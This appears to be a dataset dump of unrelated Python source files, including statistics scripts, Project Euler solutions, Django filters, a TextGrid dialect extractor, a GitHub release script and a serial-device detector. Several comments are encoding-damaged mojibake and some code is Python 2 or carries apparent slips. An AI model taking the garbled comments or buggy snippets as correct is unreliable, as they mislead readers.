"""
anova_pattern = re.compile("F\(\d+,\d+\)=(\d+\.\d+)\tp<(0.\d\d\d)$")
metrics_file = open(metrics_config_file, 'rb')
metrics = yaml.load(metrics_file)
for metric in metrics:
metric_name = metric['name']
metric_caption = metric['caption']
metric_label = metric['label']
print "opening {0}".format("{0}-f.txt".format(metric_name))
input_file = open("{0}-f.txt".format(metric_name), 'rb')
values = []
for line in input_file:
# print line
match = re.search(anova_pattern, line)
if not match:
print("Can't find ANOVA values in input! Aborting.")
sys.exit(1)
values.extend([match.group(1), match.group(2)])
print "len(values): {0}".format(len(values))
print "values: {0}".format(values)
output_text = table_header.format(dof) + table_body.format(*values) + table_footer.format(metric_caption, metric_label)
out_file = open(os.path.join(output_dir, "{0}-f.txt".format(metric_name)), 'wb')
out_file.write(output_text)
out_file.close()
|
12,930 | fca65c0bded19a759f84e4666861263c5f1a9389 | # Lattice paths
# Problem 15
# Starting in the top left corner of a 2ร2 grid, and only being able to move
# to the right and down, there are exactly 6 routes to the bottom right corner.
# RRDD
# RDRD
# RDDR
# DRRD
# DRDR
# DDRR
# How many such routes are there through a 20ร20 grid?
import time
start = time.time()
result = 0
# Until such time as we've reached 20 selections, we have 2^20 possibilities
# Then, the remaining 20 selections depend on the availability of Ds and Rs.
# We have 40 choices, so there are 40! ways of arranging them.
# Each different arrangement has 20! arrangements for down and 20! arrangements
# for right, giving (20!)^2 possibilities or each particular layout.
# Simply divide one by the other.
from math import factorial
side_length = 20
moves = side_length * 2
sl_fact = factorial(side_length)
moves_fact = factorial(moves)
result = moves_fact // sl_fact**2
print ('Result is {}'.format(result))
end = time.time()
print ('Time taken: {:.6f}s'.format(end - start))
|
12,931 | 26777741a2440cb1abc83d6fe6c9b93bce1527a5 | def calculate_sum(number_to_sum):
"""Linear time solution"""
sum = 0
for i in range(1, number_to_sum+1):
sum += i
return sum
# print(calculate_sum(3)) # 3+2+1=6
# print(calculate_sum(11))
def calculate_sum_constant_time(number_to_sum):
"""Constant time solution"""
if number_to_sum % 2 == 0:
pairs = number_to_sum // 2
pair_sum = 1 + number_to_sum
return pairs * pair_sum
else:
number_to_sum -= 1
pairs = number_to_sum // 2
pair_sum = 1 + number_to_sum
return (pairs * pair_sum)+(number_to_sum+1)
# print(calculate_sum_more_performant(4)) # 1 + 2 + 3 + 4 = 5+5 = 10
# print(calculate_sum_more_performant(3)) # 6, 1+2+3
# print(calculate_sum_more_performant(11)) #
def calculate_sum_math_formula(n):
"""Constant time solution"""
return n * (n + 1) // 2
# print(calculate_sum_math_formula(11))
# print(calculate_sum_math_formula(3))
import time
def sum_to_n(n):
# record start time
start = time.time()
# run the function's code
total = 0
for i in range(n + 1):
total += i
# record end time
end = time.time()
return total, end - start
output_template = '{}({}) = {:15d} ({:8.7f} seconds)'
for i in range(1, 10):
print(output_template.format('sum_to_n', i * 1000000, *sum_to_n(i * 1000000)))
|
12,932 | 85b58f70abc83c56d321a50d1af173e1fcf1b920 | #! /usr/bin/python
__author__ = 'tri1@umbc.edu'
# Patrick Trinkle
# Summer 2011
#
# Because I got worried that I would hit the limit of the number of files you're allowed to have; this
# moves the system back into a single flat file database.
#
# UGH: This version double_unescapes more, and doesn't escape anything. I'm assuming the insert python handles this correctly.
import os
import re
import sys
import datetime
import tweetdatabase as td
def usage():
sys.stderr.write("usage: %s <user_list> <database_folder>\n" % sys.argv[0])
def main():
# --------------------------------------------------------------------------
# Did they provide the correct args?
if len(sys.argv) != 3:
usage()
sys.exit(-1)
startTime = datetime.datetime.now()
user_file = sys.argv[1]
database_folder = sys.argv[2]
# --------------------------------------------------------------------------
# Read in the database files and write out the giant database file.
with open(user_file, "r") as f:
for line in f:
id = re.search("<id>(\d+?)</id>", line)
if id == None:
sys.stderr.write("ah!, bailing here\n")
sys.exit(-1)
# get it ready for insertion
user_id = int(id.group(1))
path = td.getPath(database_folder, user_id)
print user_id
try:
os.unlink(path)
except Exception:
pass
# --------------------------------------------------------------------------
# Done.
print "total runtime: ",
print (datetime.datetime.now() - startTime)
if __name__ == "__main__":
main()
|
12,933 | e707ee4deae23ab1fcdb5c38012c1403b659a805 | import seamless
from seamless.core import macro_mode_on
from seamless.core import context, cell, transformer, pytransformercell, link
with macro_mode_on():
ctx = context(toplevel=True)
ctx.cell1 = cell().set(1)
ctx.cell2 = cell().set(2)
ctx.result = cell()
ctx.tf = transformer({
"a": "input",
"b": "input",
"c": "output"
})
ctx.cell1_link = link(ctx.cell1)
ctx.cell1_link.connect(ctx.tf.a)
ctx.cell2.connect(ctx.tf.b)
ctx.code = pytransformercell().set("""
import time
time.sleep(3)
c = a + b
""")
ctx.code.connect(ctx.tf.code)
ctx.result_link = link(ctx.result)
ctx.tf.c.connect(ctx.result_link)
def callback():
print("Equilibration complete")
ctx._get_manager().on_equilibrate(callback)
ctx.cell1.set(10)
for n in range(5):
ctx.equilibrate(1)
print(ctx.status(), ctx.result.value)
ctx._get_manager().on_equilibrate(callback)
ctx.cell1.set(12)
for n in range(5):
ctx.equilibrate(1)
print(ctx.status(), ctx.result.value)
|
12,934 | 5a451ae4be8bf2b593c465274e48ad01a044eb07 | # ๅ่กจๆจๅฏผๅผไฝ็จๆฏไฝฟ็จ้ดๅ็่ฏญๆณๅๅๅๅปบไธไธชๅ่กจ
nums = [i for i in range(10)]
points = [(x,y) for x in range(5, 9) for y in range(1, 4)] |
12,935 | 3bb3268458a581261463f4c9a8bc80b28687dfaf | import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
# ๅฐๆไปถๅฏผๅ
ฅ
file_path = "IMDB-Movie-Data.csv"
df = pd.read_csv(file_path)
# ็ป่ฎกๅ็ฑป็ๅ่กจ
temp_list = df["Genre"].str.split(",").tolist() # ๅฐๆไธๅ่พนๆ [[],[],[]]่ฟ็งๅฝขๅผ
# print(temp_list)
# ๅป้ๅนถไธๅ่กจๅ
genre_list = list(set([i for j in temp_list for i in j]))
# print(temp_list)
# ๆ้ ๅ
จไธบ0็ๅ็ฑปๅ่กจ
# | A | B | C |
# | 0 | 0 | 0 |
# | 0 | 0 | 0 |
# | 0 | 0 | 0 |
# ไพๅฆไธ้ข่ฟไธช่กจๆ ผ๏ผๆฏไธ่กไปฃ่กจไธไธช็ตๅฝฑๅฏนๅบ็ๅ็ฑป๏ผ่ฆๆณ็ฅ้ๆไธชๅ็ฑปๅฏนๅบ็ๆป็็ตๅฝฑๆฐ้๏ผๅช้่ฆๅฏนๅ่ฟ่กๆฑๅๅณๅฏ
zeros_df = pd.DataFrame(np.zeros((df.shape[0], len(genre_list))), columns=genre_list)
# print(zeros_df)
# ็ปๆฏไธช็ตๅฝฑๅบ็ฐ็ๅ็ฑปไฝ็ฝฎ่ตๅผ1
for i in range(df.shape[0]):
zeros_df.loc[i, temp_list[i]] = 1
# ็ป่ฎกๆฏไธชๅ็ฑป็็ตๅฝฑ็ๆฐ้ๅ
genre_count = zeros_df.sum(axis=0)
# print(genre_count)
# ๅฏน็ปๆ่ฟ่กๆๅบ
genre_count = genre_count.sort_values()
print(genre_count)
_x = genre_count.index
_y = genre_count.values
# ็ปๅพ
plt.figure(figsize=(20, 8), dpi=40)
plt.bar(range(len(_x)),_y)
plt.xticks(range(len(_x)), _x)
plt.show()
|
12,936 | 77563f5d47c2bb1b98dedd69fca428a87b9c5bc7 | from os import path, makedirs, getcwd
from glob import glob
from runHgammaSelector import processHg
from pprint import pprint
debug = False
first = True
#for variation in [("nom", 0), ("up", 1), ("down", -1)]:
for btagVariation in [("nom", 0)]:
for phSFvariation in [("nom", 0), ("up", 1), ("down", -1)]:
baseDir = path.join(getcwd(), "organize_smallifications")
#categories = ["backgrounds", "signals", "data"]
categories = ["signals"]
catDirs = {}
for category in categories:
catDirs[category] = path.join(baseDir, category)
pprint(catDirs)
outDir = baseDir.replace("smallifications", "DDs_btag-%s_phSF-%s" % (btagVariation[0], phSFvariation[0]))
if not path.exists(outDir):
makedirs(outDir)
print "catDirs", catDirs
for catDir in catDirs:
catOutDir = path.join(outDir, catDir)
inputFiles = glob("%s/%s/*.root" % (baseDir, catDir))
if not path.exists(catOutDir):
makedirs(catOutDir)
for inputFile in inputFiles:
if first:
print "about to call the first processHg"
processHg(inputFile, inputFile.replace("smallified", "ddTree").replace("smallifications", "DDs_btag-%s_phSF-%s" % (btagVariation[0], phSFvariation[0])), False, False, btagVariation[1], phSFvariation[1])
first = False
elif not debug:
processHg(inputFile, inputFile.replace("smallified", "ddTree").replace("smallifications", "DDs_btag-%s_phSF-%s" % (btagVariation[0], phSFvariation[0])), True, True, btagVariation[1], phSFvariation[1])
|
12,937 | eb4dfb4bdb3773f1aba571fabf8adbf601b59879 | #03.Recebe um valor em minutos, retorna o equivalente em horas e minutos.
def hora_minutos(min):
h = min // 60
m = min % 60
return "%d:%d" %(h,m)
print(hora_minutos(300))
|
12,938 | b597c9edc98c237cef55654020918354a52b4118 | import django_filters
from django import forms
from .models import BookPath, Category, Book
class BookPathFilter(django_filters.FilterSet):
name = django_filters.CharFilter(lookup_expr='iexact')
description = django_filters.CharFilter(lookup_expr='icontains')
author = django_filters.CharFilter()
category = django_filters.ModelMultipleChoiceFilter(
queryset=Category.objects.all(), widget=forms.CheckboxSelectMultiple)
followers = django_filters.NumberFilter(label='With more than X followers',
field_name='follow_count', lookup_expr='gt')
steps = django_filters.NumberFilter(label='With at most X steps', field_name='steps', lookup_expr='lte')
o = django_filters.OrderingFilter(
fields=(
('name', 'name'),
('author', 'author'),
('category', 'category'),
('follow_count', 'follow_count'),
('steps', 'steps'),
),
field_labels={
'follow_count': 'Followers',
'steps':'Steps',
}
)
class Meta:
model = BookPath
exclude = []
class BookFilter(django_filters.FilterSet):
title = django_filters.CharFilter(lookup_expr='iexact')
author = django_filters.CharFilter(lookup_expr='icontains')
publisher = django_filters.CharFilter(
field_name='publishers', lookup_expr='icontains')
number_of_pages = django_filters.NumberFilter(label='Less than X pages',
field_name='number_of_pages', lookup_expr='lt')
paths = django_filters.NumberFilter(label='Included in at least X paths', field_name='paths', lookup_expr='gte')
o = django_filters.OrderingFilter(
fields=(
('title', 'title'),
('author', 'author'),
('number_of_pages', 'number_of_pages'),
('paths', 'paths'),
),
field_labels={
'number_of_pages': 'Pages',
'paths': 'Paths in which the book appears',
}
)
class Meta:
model = Book
exclude = ['isbn_10', 'isbn_13', 'cover']
|
12,939 | 7041c6ed956cb1a78f7da2f167d8112769784fff | # recover, segment remove it.q
import os
import re
import math
import textgrid
import traceback
import string
import pandas as pd
from SWG_utils import compile_pattern, timestamp_convert, output_clauses_csv, create_clauses_csv
def read_lex_table(lex_table_path): # TODO: is this necessary? at all? check the other available read_lex_table method
if lex_table_path.endswith(".xlsx"):
lex = pd.read_excel(lex_table_path, index_col=None, header=0)
else:
lex = pd.read_csv(lex_table_path, index_col=None, header=0)
lex.dropna(axis='columns', how='all', inplace=True)
print(lex.columns)
# lex.drop(['word_POS'], axis=1, inplace=True)
# print(lex.columns)
return lex
# TODO : check how much is overlapped with clauses extract and see if we can merge some functionalities.
def create_rel_clauses_extract(extract_path, tg_path, lex_table, pos_tagger):
if not os.path.exists(extract_path): # if the csv does not exist, create the csv
create_clauses_csv()
TextGrid_file_list = [file for file in os.listdir(tg_path) if file.endswith('.TextGrid')]
variant_match = dict()
for r in zip(lex_table['word_variant'], lex_table['word_standard'], lex_table['word_vars'],
lex_table['POS_tag']):
# dict with variant as key.
# if no match tag the thing
v_pattern = compile_pattern(r[0], r[2])
if v_pattern not in variant_match.keys():
variant_match[v_pattern] = []
else:
print(v_pattern) # add it? no
variant_match[v_pattern].append(r)
gehen_variants = set()
locations = lex_table.loc[lex_table['word_lemma'] == 'gehen']
for gehen_var in zip(locations['word_variant'], locations['word_vars']):
if "SAF5" not in gehen_var[1]:
g_pattern = compile_pattern(gehen_var[0], gehen_var[1])
gehen_variants.add(g_pattern)
# for gehen_row in lex_table.loc[lex_table['word_lemma'] == 'gehen']['word_variant']:
# # check the word_vars
# if not any("SAF5" in wv for wv in lex_table.loc[lex_table['word_variant'] == gehen_row]['word_vars']):
# g_pattern = compile_pattern(gehen_row)
# gehen_variants.add(g_pattern)
for each_file_name in TextGrid_file_list:
# now combine the files of the same speakers
print(each_file_name)
interval_num = 0
file_path = tg_path + each_file_name
try:
file_textgrid_obj = textgrid.TextGrid.fromFile(file_path)
except UnicodeDecodeError:
print(
each_file_name +
': the encode is weird, not utf-8 or ansi')
tier_list = file_textgrid_obj.tiers
for each_tier in tier_list:
if each_tier.name == 'SWG': # read from swg tier
tier_swg = each_tier
intervals_swg = tier_swg.intervals
try:
clauses = []
clause_annotation = []
time_segment = dict()
skip = False
begin_tag = ''
for each_annotation in intervals_swg:
annotation_mark = each_annotation.mark
beg_hms = timestamp_convert(each_annotation.minTime)
if not annotation_mark.strip(): continue
punct = [',', '.', '!', '?'] # maybe just . ! ?
tokens = annotation_mark.split()
time_segment[beg_hms] = tokens
for token in tokens:
if any(p in token for p in punct): # function that turn segments into clauses
if all(c in string.punctuation for c in token): # this is for token like ... --- and ???
if not clause_annotation:
time_stamp = beg_hms
clause_annotation.append(token)
if len(token) > 3 or token in punct: # why do I do this again, still don't know
clause_annotation.append(time_stamp)
clauses.append(clause_annotation)
clause_annotation = []
continue
word_punct_split = re.findall(
r"[^\w\d\s,.!?]*\w+[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*|[^\w\s]", token,
re.UNICODE) # separate word with punctuation
for wp in word_punct_split: # maybe to split annotations into clauses
if not clause_annotation:
time_stamp = beg_hms
clause_annotation.append(wp)
if all(c in punct for c in wp):
clause_annotation.append(time_stamp)
clauses.append(clause_annotation)
clause_annotation = []
else:
if not clause_annotation:
time_stamp = beg_hms
clause_annotation.append(token)
for cl in clauses:
if '[ANT]' in cl or '[REL]' in cl:
# print("clause", cl)
beg_hms = cl[-1]
# print("time", beg_hms)
cl = cl[:-1]
# print("cl", cl)
if cl[0] not in time_segment[beg_hms]: # closer remaining is the punctuation problem
segment_annotation = []
for token in time_segment[beg_hms]:
segment_annotation += re.findall(
r"[^\w\d\s,.!?]*\w+[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*\w*[^\w\d\s,.!?]*|[^\w\s]", token,
re.UNICODE)
if cl[0] not in segment_annotation:
print(segment_annotation)
print(cl[0])
else:
segment_annotation = time_segment[beg_hms]
sym_seq = segment_annotation.index(cl[0]) + 1
words_std = []
ddm_tags = []
pos_sent = []
# get ddm
for i, word in enumerate(cl):
if word: # empty word check
# match w with word_variant
std_list = set()
ddm_list = set()
pos_list = set()
no_match = True
rel = False
# check for var: REL
if i + 1 < len(cl): # make sure next word exist
w_next = cl[i + 1]
if "[REL]" in w_next:
rel = True
if "wo" in word:
rel_var = " RELd"
elif "als" in word or word.startswith("d") or word.startswith(
"wel") or word.startswith("jed"):
rel_var = " RELs"
elif ("was" in word) or ("wie" in word) or ("wer" in word):
rel_var = " RLOs"
else:
rel_var = " UNK"
for p in variant_match.keys():
if p.search(word) is not None: # .lower()
no_match = False
for values in variant_match[p]:
swg = values[0].replace("*", "")
# rum[ge]draat
if "ge" in swg and "ge" not in word:
swg = swg.replace("ge", "g") # for gespielt gspielt
std = values[1].replace("*", "")
std_list.add(std)
if isinstance(values[2], float) and math.isnan(
values[2]): # check for empty var_code
pass # do nothing
else:
ddm_list.add(values[2]) # should be set
if isinstance(values[3], float) and math.isnan(values[3]):
pos_list.add('*')
else:
pos_list.add(values[3])
if no_match:
standard = word
ddm = "*"
pos = pos_tagger.tag([word])[0][1]
if "$" in pos:
pos = "*"
else:
standard = " ".join(std_list)
ddm = " ".join(str(d) for d in ddm_list)
if any("SAF5" in d for d in ddm_list):
for g_pattern in gehen_variants:
if g_pattern.search(word) is not None:
print(ddm)
print(word)
print("!") # gegang* [ge]gang* will be taged as SAF5
# k as prefix
ddm = ddm.replace("SAF5d", "")
ddm = ddm.replace("SAF5s", "")
print(ddm)
pos = " ".join(str(p) for p in pos_list)
if rel:
if ddm != "*":
ddm = ddm + rel_var
else:
ddm = rel_var
ddm = ddm.strip()
words_std.append(standard)
ddm_tags.append(ddm)
pos_sent.append(pos)
# columns
output_clauses_csv(extract_path, each_file_name[each_file_name.rfind("_") + 1:-9], beg_hms, sym_seq,
" ".join(cl), " ".join(ddm_tags),
" ".join(pos_sent))
except AttributeError as e:
print(
each_file_name +
': tier words is empty or does not exist ')
traceback.print_tb(e.__traceback__)
# if __name__ == '__main__':
# date = '20220310'
# types = 'noSocialInfo' + '.csv'
# working_directory = '/Users/gaozhuge/Documents/Tuebingen_Uni/hiwi_swg/DDM/'
# # simplify this
# extract_type = 'clauses_rel'
# speaker_tg_path_dict = {
# working_directory + 'SWG_trend_' + extract_type + '_' + date + types: [working_directory + 'trend_tg/'],
# working_directory + 'SWG_twin_' + extract_type + '_' + date + types: [working_directory + 'twin_tg/'],
# working_directory + 'SWG_panel_' + extract_type + '_' + date + types: [working_directory + 'recovery_1982/',
# working_directory + 'recovery_2017/']}
# speaker_tg_path_dict = {'SWG_trend_' + extract_type + '_' + date + types: [working_directory + 'trend_tg/']}
# speaker_tg_path_dict = {'SWG_panel_clauses_rel_'+date_type:[working_directory+'recovery_1982/',working_directory+'recovery_2017/'], 'SWG_trend_clauses_rel_'+date_type:[working_directory+'trend_tg/']} #
# 'SWG_twin_clauses_rel_'+date_type:[working_directory+'twin_tg/']๏ผ 'SWG_style_' + extract_type + '_' + date + types: [working_directory + 'style_tg/']
# lex_table_path = working_directory+'SG-LEX 12feb2021.csv'
# done_path = working_directory+"done/"
# for extract_name in speaker_tg_path_dict.keys():
# for tg_path in speaker_tg_path_dict[extract_name]:
# extract_path = extract_name
# transform = Transform(tg_path, extract_path)
# transform.start()
# tg_path = '/Users/gaozhuge/Documents/Tuebingen_Uni/hiwi_swg/DDM/test/'
# extract_path = '/Users/gaozhuge/Documents/Tuebingen_Uni/hiwi_swg/DDM/test.csv'
# transform = Transform(tg_path, extract_path)
# transform.start()
|
12,940 | dfd901ef7651f318d31ddebb113af4980b775921 | # For some reason patch releases with Semantic Release are tagged as "pre-release" on GitHub. This script
# removes the "pre-release" tag from the release.
import os
import sys
import requests
USAGE = f"Usage: python {sys.argv[0]} [--help] | version_being_released (e.g., v0.19.1)]"
def get_prerelease_status(version_being_released, token):
    """Return ``(is_prerelease, release_id)`` for the GitHub release tagged
    ``v<version_being_released>`` in the feast-dev/feast repository.

    Raises KeyError if no release exists under that tag (the API response
    then has no 'prerelease'/'id' fields).
    """
    tag_url = (
        "https://api.github.com/repos/feast-dev/feast/releases/tags/"
        f"v{version_being_released}"
    )
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/vnd.github.v3+json",
        "Authorization": f"Bearer {token}"
    }
    release = requests.request("GET", tag_url, headers=headers).json()
    return bool(release['prerelease']), release['id']
def set_prerelease_status(release_id, status, token):
    """PATCH GitHub release *release_id* so its ``prerelease`` flag equals
    *status*. Fire-and-forget: the response is not checked here (the caller
    re-reads the status afterwards)."""
    url = f"https://api.github.com/repos/feast-dev/feast/releases/{release_id}"
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/vnd.github.v3+json",
        "Authorization": f"Bearer {token}"
    }
    body = {"prerelease": status}
    requests.request("PATCH", url, json=body, headers=headers)
def main() -> None:
    """Clear the 'pre-release' flag on a feast release tagged by semantic release.

    Expects one CLI argument: the version being released. USAGE shows the
    v-prefixed form ("v0.19.1") while the API URL prepends "v" itself, so we
    accept both "0.19.1" and "v0.19.1" (fix: previously "v0.19.1" produced a
    broken "vv0.19.1" tag lookup).

    Raises
    ------
    SystemExit  on wrong argument count.
    OSError     when GITHUB_TOKEN is not set in the environment.
    """
    args = sys.argv[1:]
    if len(args) != 1:  # `not args` was redundant with the length check
        raise SystemExit(USAGE)
    version_being_released = args[0].strip()
    if version_being_released.startswith("v"):
        version_being_released = version_being_released[1:]
    print(f"Disabling prerelease status for {version_being_released}")
    token = os.getenv('GITHUB_TOKEN', default=None)
    if token is None:
        raise OSError("GITHUB_TOKEN environmental variable is not set")
    is_prerelease, release_id = get_prerelease_status(version_being_released, token)
    if not is_prerelease:
        print(f"{version_being_released} is not a pre-release, exiting.")
        sys.exit(0)  # sys.exit instead of the REPL-only exit() builtin
    set_prerelease_status(release_id, False, token)
    # Read back to confirm the PATCH actually took effect.
    is_prerelease, release_id = get_prerelease_status(version_being_released, token)
    if is_prerelease:
        import warnings
        warnings.warn(f"Failed to unset prerelease status for {version_being_released} release id {release_id}")
    else:
        print(f"Successfully unset prerelease status for {version_being_released} release id {release_id}")
if __name__ == "__main__":
main()
|
12,941 | f8370a6f0e38ab9bf7b94706b89daefcc3100d41 |
import sys
from os.path import join, dirname, abspath
import serial
#import serial.tools.list_ports as port_list
#from serial.tools import *
from qtpy import uic
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt
from qtpy.QtWidgets import QApplication, QMainWindow, QMessageBox, QAction, QDialog, QTableWidgetItem
from pyqtgraph import PlotWidget
import pyqtgraph as pg
from collections import deque
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QGroupBox
import math
import os
import numpy as np
import random
import qtmodern.styles
import qtmodern.windows
import time
import json
import pprint
from math import pi, sin
from PyQt5.QtMultimedia import *
import struct
from time import sleep
class DetectDevices(object):
    """Enumerate USB serial ports and classify attached boards by the text
    banner they emit on connect (Marlin firmware, a custom encoder board, or
    — by elimination — the sensor board)."""

    def __init__(self):
        self.ports = []            # all serial ports from the last scan
        self.usbports = []         # subset whose hwid mentions 'USB'
        self.selected_ports = []
        # Classified port tuples; ["NA"] until detectCustomBoards finds them.
        self.MarlinPort = ["NA"]
        self.SensorPort = ["NA"]
        self.EncoderPort = ["NA"]

    def listPorts(self):
        """Refresh self.ports from pyserial's comports() and return it."""
        from serial.tools.list_ports import comports
        self.ports = list(comports())
        return self.ports

    def listUsbPorts(self):
        """Refresh self.usbports with ports whose hwid string contains 'USB'."""
        self.listPorts()
        self.usbports.clear()
        for port in self.ports:
            # port[2] is the hwid string of the (port, desc, hwid) tuple
            if 'USB' in port[2]:
                self.usbports.append(port)

    def printPorts(self):
        """Print the device name of every serial port."""
        self.listPorts()
        for port in self.ports:
            print(port[0])

    def printUsbPorts(self):
        """Print the device name of every USB serial port."""
        self.listUsbPorts()
        for port in self.usbports:
            print(port[0])

    def detectCustomBoards(self):
        """Probe each USB port and assign it to MarlinPort, EncoderPort or
        (by default) SensorPort based on its boot banner."""
        self.listUsbPorts()
        print(f"Number of USB Ports : {len(self.usbports)}")
        print('waiting 5 seconds')
        time.sleep(5)  # give freshly-plugged boards time to enumerate
        for port in self.usbports:
            uart_lines = self.connectAndRead(port)
            if any(b'Marlin' in line for line in uart_lines):
                self.MarlinPort = port
                continue
            if any(b'Encoder Board' in line for line in uart_lines):
                self.EncoderPort = port
                continue
            # Unrecognized banner: assume it is the sensor board.
            self.SensorPort = port

    def connectAndRead(self, port):
        """Open *port* at 115200 baud and read up to 10 raw lines.

        Returns a list of byte strings; returns [] on any connection/read
        error (fix: previously returned None, which crashed
        detectCustomBoards when it iterated the result). The port is always
        closed (fix: previously leaked the open handle).
        """
        print(f"Opening Port : {port[0]}")
        xlines = []
        uart = None
        try:
            uart = serial.Serial(port[0], baudrate=115200, timeout=1)
            time.sleep(1.5)  # let the board finish resetting and print its banner
            for _ in range(10):
                xlines.append(uart.readline())
        except Exception as e:
            print(f"Error Connect Or Reading Serial Port:{port[0]} " + str(e))
            return []
        finally:
            if uart is not None:
                uart.close()
        return xlines
|
12,942 | 69f4ed7495f4e65173a7e89f0eb5916bb2c3173d | # coding=utf-8
# Created by OhBonsai at 2018/3/13
# -*- coding: utf-8 -*-
from faker import Faker
from app.models.user import User, Group
def create_admin():
    """Build (but do not persist) the admin user 'sketch' with a fixed password."""
    u = User(username='sketch')
    u.email = 'letbonsaibe@gmail.com'
    u.is_admin = True
    u.set_password("123456")
    # NOTE(review): both `is_admin` and `admin` are set — confirm which
    # attribute the User model actually reads.
    u.admin = True
    return u
def create_user():
    """Build (but do not persist) a regular test user — note `admin` is still
    set True here, mirroring create_admin; presumably intentional for tests."""
    u = User(username='test')
    u.email = 'letbonsaibe@gmail.com'
    u.set_password("123456")
    u.admin = True
    return u
def create_group():
    """Build (but do not persist) a Group named 'test'."""
    g = Group(name='test')
    return g
def create_users(n=50):
    """Build *n* unsaved User objects populated with deterministic fake data
    (Faker seeded with 42, so repeated calls produce the same users)."""
    fake = Faker()
    # NOTE(review): instance-level seed() is the legacy Faker API — confirm
    # the pinned faker version still supports it.
    fake.seed(42)

    def _make_user():
        account = User(username=fake.name())
        account.email = fake.email()
        account.set_password(fake.password())
        return account

    return [_make_user() for _ in range(n)]
def sketch(**kwargs):
    """Return (user, plaintext_password) for the admin fixture 'sketch'.

    Extra attributes can be overridden via **kwargs (applied through the
    model's apply_kwargs helper).
    """
    user = User(username="sketch")
    user.email = "letbonsaibe@gmail.com"
    user.set_password("123456")
    user.is_admin = True
    return user.apply_kwargs(kwargs), "123456"
def lotus(**kwargs):
    """Return (user, plaintext_password) for a non-admin fixture.

    NOTE(review): the username here is 'sketch', not 'lotus' — this looks
    like a copy-paste leftover from sketch(); confirm the intended username.
    """
    user = User(username="sketch")
    user.email = "letbonsaibe@gmail.com"
    user.set_password("123456")
    return user.apply_kwargs(kwargs), "123456"
|
12,943 | adc240632b8782901fbdff2579cd8ef3e7321171 |
def main():
    """Minimum-cut chocolate-bar division (competitive-programming style).

    Reads an H x W grid of 0/1 squares and K, then prints the minimum total
    number of straight cuts so each resulting piece contains at most K white
    (1) squares. All 2^(H-1) horizontal cut patterns are brute-forced via a
    bitmask; for each pattern, vertical cuts are placed greedily left to
    right using 2-D prefix sums.
    """
    H,W,K=map(int,input().split())
    S=[]
    for i in range(H):
        col=list(map(int,list(input())))
        S.append(col)
    # 2-D prefix sums: CumulativeS[i][j] = sum of S over rows 0..i, cols 0..j
    CumulativeS=[[S[i][0]] for i in range(H)]
    for i in range(len(S)):
        for j in range(1,len(S[i])):
            CumulativeS[i].append(CumulativeS[i][j-1]+S[i][j])
    for i in range(1,len(S)):
        for j in range(len(S[i])):
            CumulativeS[i][j]+=CumulativeS[i-1][j]
    all_bit=1<<H-1
    res=10000
    for bit in range(all_bit):
        # wide_bound: row indices after which this pattern cuts horizontally
        wide_bound=[]
        for i in range(H-1):
            if (bit & (1<<i))!=0:
                wide_bound.append(i)
        res_=len(wide_bound)
        # high_bound: column indices after which a vertical cut was placed
        high_bound=[]
        high_flag=0  # 1 when a single column already exceeds K -> pattern infeasible
        for i in range(W):
            if len(high_bound)==0:
                # No vertical cut yet: band totals are plain prefix sums up to col i.
                for b in range(len(wide_bound)):
                    if b==0:
                        white_chocolate=CumulativeS[wide_bound[b]][i]
                    else:
                        white_chocolate=CumulativeS[wide_bound[b]][i]-CumulativeS[wide_bound[b-1]][i]
                    if white_chocolate>K:
                        if i-1<0:
                            high_flag=1
                            break
                        high_bound.append(i-1)
                        break
                    if b==len(wide_bound)-1:
                        # bottom band, below the last horizontal cut
                        white_chocolate=CumulativeS[H-1][i]-CumulativeS[wide_bound[b]][i]
                        if white_chocolate > K:
                            if i-1<0:
                                high_flag=1
                                break
                            high_bound.append(i - 1)
                if high_flag==1:
                    break
                if len(wide_bound)==0:
                    # no horizontal cuts: the whole column span is one band
                    white_chocolate = CumulativeS[H - 1][i]
                    if white_chocolate>K:
                        if i-1<0:
                            high_flag=1
                            break
                        high_bound.append(i-1)
            else:
                # Subtract everything left of the last vertical cut from each band.
                for b in range(len(wide_bound)):
                    if b == 0:
                        white_chocolate = CumulativeS[wide_bound[b]][i]-CumulativeS[wide_bound[b]][high_bound[len(high_bound)-1]]
                    else:
                        white_chocolate = CumulativeS[wide_bound[b]][i] - CumulativeS[wide_bound[b - 1]][i]-CumulativeS[wide_bound[b]][high_bound[len(high_bound)-1]]+CumulativeS[wide_bound[b-1]][high_bound[len(high_bound)-1]]
                    if white_chocolate>K:
                        if i-1<0:
                            high_flag=1
                            break
                        high_bound.append(i-1)
                        break
                    if b == len(wide_bound) - 1:
                        white_chocolate = CumulativeS[H - 1][i] - CumulativeS[wide_bound[b]][i]-CumulativeS[H-1][high_bound[len(high_bound)-1]]+CumulativeS[wide_bound[b]][high_bound[len(high_bound)-1]]
                        if white_chocolate>K:
                            if i-1<0:
                                high_flag=1
                                break
                            high_bound.append(i-1)
                if high_flag==1:
                    break
                if len(wide_bound)==0:
                    # NOTE(review): indexes column W-1 here rather than i —
                    # looks inconsistent with the branch above; confirm.
                    white_chocolate = CumulativeS[H - 1][W - 1]-CumulativeS[H-1][high_bound[len(high_bound)-1]]
                    if white_chocolate>K:
                        if i-1<0:
                            high_flag=1
                            break
                        high_bound.append(i-1)
        res_+=len(high_bound)
        if res_<res and high_flag==0:
            res=res_
    print(res)
if __name__=="__main__":
main() |
12,944 | 8b9ea17246b362884d10574cd6d7719d495c1be6 | if __name__ == "__main__":
    # Demo: seed a 100x100 Game of Life board with 20 randomly placed library
    # patterns plus 30% random live cells, then hand it to the runner.
    from gol import run, GOL, PATTERNS
    import numpy as np
    size = 100
    n_patterns = 20
    board = np.zeros((size, size), dtype="int")
    for i in range(n_patterns):
        # Pick a pattern and a random anchor cell; add_to presumably stamps
        # the pattern onto the board in place — confirm against gol.py.
        pattern = np.random.choice(PATTERNS)
        row = np.random.choice(np.arange(size))
        col = np.random.choice(np.arange(size))
        pattern.add_to(board, row, col)
    gol = GOL(board)
    gol.add_random_cells(coverage=0.3)
    run(gol)
|
12,945 | 6b1fd8954ba93e7563e9a10d80b135904d16f35e | #!/usr/bin/env mayapy
import inspect
import os
import sys
